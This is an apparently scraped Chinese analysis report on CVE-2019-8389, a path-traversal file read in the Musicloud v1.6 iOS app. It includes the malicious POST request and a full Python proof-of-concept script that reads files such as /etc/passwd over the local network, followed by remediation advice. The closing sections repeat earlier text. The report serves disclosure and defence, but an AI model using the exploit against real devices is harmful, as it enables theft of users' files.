MUSICLOUD V1.6 任意文件读取漏洞(CVE-2019-8389)分析报告<\/h1>

漏洞概述<\/h2>
CVE-2019-8389是iOS应用程序Musicloud v1.6中存在的一个任意文件读取漏洞。该漏洞允许攻击者通过构造特殊的HTTP请求，读取目标设备上的任意文件，包括敏感系统文件如\/etc\/passwd。<\/p>

漏洞背景<\/h2>

Musicloud是一个音乐播放器应用程序，主要功能包括：<\/p>

存储和播放来自不同来源的音乐<\/li>
支持从Dropbox、Google Drive和本地计算机导入音乐<\/li>

提供无线传输功能用于手机和电脑之间的音乐传输<\/li> <\/ul>

漏洞详情<\/h2>

无线传输服务<\/h3>

当用户启用无线传输功能时：<\/p>

服务运行在设备外部IP的8080端口<\/li>
同一局域网内的所有用户都可以访问该服务<\/li>

服务提供两个关键脚本：

\/download.script<\/code> - 用于下载音乐<\/li>

\/upload.script<\/code> - 用于上传音乐<\/li>
<\/ul>
<\/li>
<\/ul>
正常下载流程<\/h3>


下载单个文件：<\/p>

GET请求格式：http:\/\/[IP]:8080\/[filename]?download<\/code><\/li>
示例：http:\/\/192.168.1.100:8080\/music-1.mp3?download<\/code><\/li>
<\/ul>
<\/li>

下载多个文件：<\/p>

发送POST请求到\/download.script<\/code><\/li>
请求体包含要下载的文件列表和当前文件夹参数<\/li>
示例请求：
POST \/download.script HTTP\/1.1
Host: 192.168.1.100:8080
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
Content-Length: 141

downfiles=music-1.mp3%0D%0Amusic-2.mp3&cur-folder=
<\/code><\/pre>
<\/li>
服务器会创建包含指定文件的MusicPlayerArchive.zip<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用原理<\/h3>
漏洞存在于\/download.script<\/code>的参数处理中：<\/p>

cur-folder<\/code>参数允许指定任意目录路径<\/li>
downfiles<\/code>参数允许指定任意文件名<\/li>
当这两个参数组合时，可以构造路径遍历攻击<\/li>
<\/ol>
漏洞利用步骤<\/h3>


构造恶意POST请求：<\/p>
POST \/download.script HTTP\/1.1
Host: 192.168.1.100:8080
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
Content-Length: 59

downfiles=passwd&cur-folder=etc\/
<\/code><\/pre>

这将尝试读取\/etc\/passwd<\/code>文件<\/li>
<\/ul>
<\/li>

服务器会创建包含目标文件的MusicPlayerArchive.zip<\/p>
<\/li>

通过GET请求下载该zip文件：

http:\/\/192.168.1.100:8080\/MusicPlayerArchive.zip<\/code><\/p>
<\/li>

解压zip文件即可获取目标文件内容<\/p>
<\/li>
<\/ol>
漏洞利用脚本<\/h2>
以下是自动化利用该漏洞的Python脚本：<\/p>
#!\/usr\/bin\/python<\/span>
<\/span><\/span># Proof of concept for CVE-2019-8389<\/span>
<\/span><\/span># Exploit author: Shawar Khan<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>def<\/span> usage<\/span>():
<\/span><\/span>    print "Usage: <\/span>\n\t<\/span> python musicloud_lfi.py 192.168.8.103 \/etc\/passwd <\/span>\n<\/span> "<\/span>
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    ip =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>    path =<\/span> sys.<\/span>argv[2<\/span>]
<\/span><\/span>    downfile =<\/span> path.<\/span>split('\/'<\/span>)[::-<\/span>1<\/span>][0<\/span>]
<\/span><\/span>    cur_fold =<\/span> '.'<\/span> +<\/span> path[:-<\/span>len(downfile)]
<\/span><\/span>    
<\/span><\/span>    print '''
<\/span><\/span><\/span>    Musicloud v1.6 iOS - Local File Read exploit
<\/span><\/span><\/span>    CVE: CVE-2019-8389
<\/span><\/span><\/span>    Author: Shawar Khan ( @shawarkhanethicalhacker )
<\/span><\/span><\/span>    '''<\/span>
<\/span><\/span>
<\/span><\/span>    def<\/span> create_archive<\/span>(file, payload):
<\/span><\/span>        post_data =<\/span> {
<\/span><\/span>            "downfiles"<\/span>: file,
<\/span><\/span>            "cur-folder"<\/span>: payload
<\/span><\/span>        }
<\/span><\/span>        print "[+] Injecting Payload..."<\/span>
<\/span><\/span>        try<\/span>:
<\/span><\/span>            inj_status =<\/span> requests.<\/span>post('http:\/\/'<\/span> +<\/span> str(ip) +<\/span> ':8080\/download.script'<\/span>, data=<\/span>post_data)
<\/span><\/span>            if<\/span> "MusicPlayerArchive.zip"<\/span> in<\/span> inj_status.<\/span>text and<\/span> inj_status.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>                print "[+] Payload successfully injected"<\/span>
<\/span><\/span>            elif<\/span> inj_status.<\/span>status_code ==<\/span> 404<\/span>:
<\/span><\/span>                print "[+] Payload injection failed, File not found"<\/span>
<\/span><\/span>                exit()
<\/span><\/span>            else<\/span>:
<\/span><\/span>                print "[+] Payload injection failed!"<\/span>
<\/span><\/span>                exit()
<\/span><\/span>        except<\/span> (requests.<\/span>exceptions.<\/span>ConnectionError) as<\/span> err:
<\/span><\/span>            print '[+] Payload injection failed! Connection refused.'<\/span>
<\/span><\/span>            exit()
<\/span><\/span>
<\/span><\/span>    def<\/span> retrieve_content<\/span>():
<\/span><\/span>        print "[+] Retrieving MusicPlayerArchive.zip"<\/span>
<\/span><\/span>        zip_content =<\/span> requests.<\/span>get('http:\/\/'<\/span> +<\/span> str(ip) +<\/span> ':8080\/MusicPlayerArchive.zip'<\/span>)
<\/span><\/span>        if<\/span> zip_content.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>            print "[+] Successfully retrieved MusicPlayerArchive.zip! <\/span>\n\n<\/span> [i] Printing content of <\/span>%s<\/span> : <\/span>\n<\/span> "<\/span> %<\/span> path
<\/span><\/span>            archive =<\/span> zip_content.<\/span>text.<\/span>splitlines()
<\/span><\/span>            for<\/span> i in<\/span> range(2<\/span>):
<\/span><\/span>                archive.<\/span>pop()
<\/span><\/span>                archive.<\/span>pop(0<\/span>)
<\/span><\/span>            print '<\/span>\n<\/span>'<\/span>.<\/span>join(archive)
<\/span><\/span>        else<\/span>:
<\/span><\/span>            print "[+] Error retrieving content!"<\/span>
<\/span><\/span>
<\/span><\/span>    create_archive(downfile, cur_fold)
<\/span><\/span>    retrieve_content()
<\/span><\/span>
<\/span><\/span>except<\/span> (IndexError<\/span>):
<\/span><\/span>    usage()
<\/span><\/span><\/code><\/pre>脚本使用说明<\/h3>


使用方法：

python musicloud_lfi.py [目标IP] [要读取的文件路径]<\/code>

示例：

python musicloud_lfi.py 192.168.1.100 \/etc\/passwd<\/code><\/p>
<\/li>

脚本功能：<\/p>

自动构造恶意POST请求<\/li>
触发漏洞创建包含目标文件的zip<\/li>
下载并提取zip文件内容<\/li>
显示目标文件内容<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞修复建议<\/h2>


对cur-folder<\/code>和downfiles<\/code>参数进行严格验证：<\/p>

限制路径只能访问特定音乐目录<\/li>
禁止路径遍历字符(如..\/)<\/li>
<\/ul>
<\/li>

实现身份验证机制：<\/p>

要求有效的用户凭证才能使用文件传输功能<\/li>
<\/ul>
<\/li>

限制网络访问：<\/p>

默认情况下不应监听所有网络接口<\/li>
可以考虑仅允许本地回环接口访问<\/li>
<\/ul>
<\/li>

更新应用程序：<\/p>

升级到已修复该漏洞的版本<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
CVE-2019-8389是一个典型的任意文件读取漏洞，由于缺乏对用户输入的有效验证而导致。攻击者可以利用该漏洞读取设备上的敏感文件，可能导致信息泄露甚至更严重的后果。开发人员应始终对所有用户提供的输入进行严格验证，特别是涉及文件系统操作时。<\/p>

MUSICLOUD V1.6 任意文件读取漏洞(CVE-2019-8389)分析报告<\/h1>

漏洞概述<\/h2> CVE-2019-8389是iOS应用程序Musicloud v1.6中存在的一个任意文件读取漏洞。该漏洞允许攻击者通过构造特殊的HTTP请求，读取目标设备上的任意文件，包括敏感系统文件如\/etc\/passwd。<\/p>

漏洞详情<\/h2>

漏洞概述<\/h2>
CVE-2019-8389是iOS应用程序Musicloud v1.6中存在的一个任意文件读取漏洞。该漏洞允许攻击者通过构造特殊的HTTP请求，读取目标设备上的任意文件，包括敏感系统文件如\/etc\/passwd。<\/p>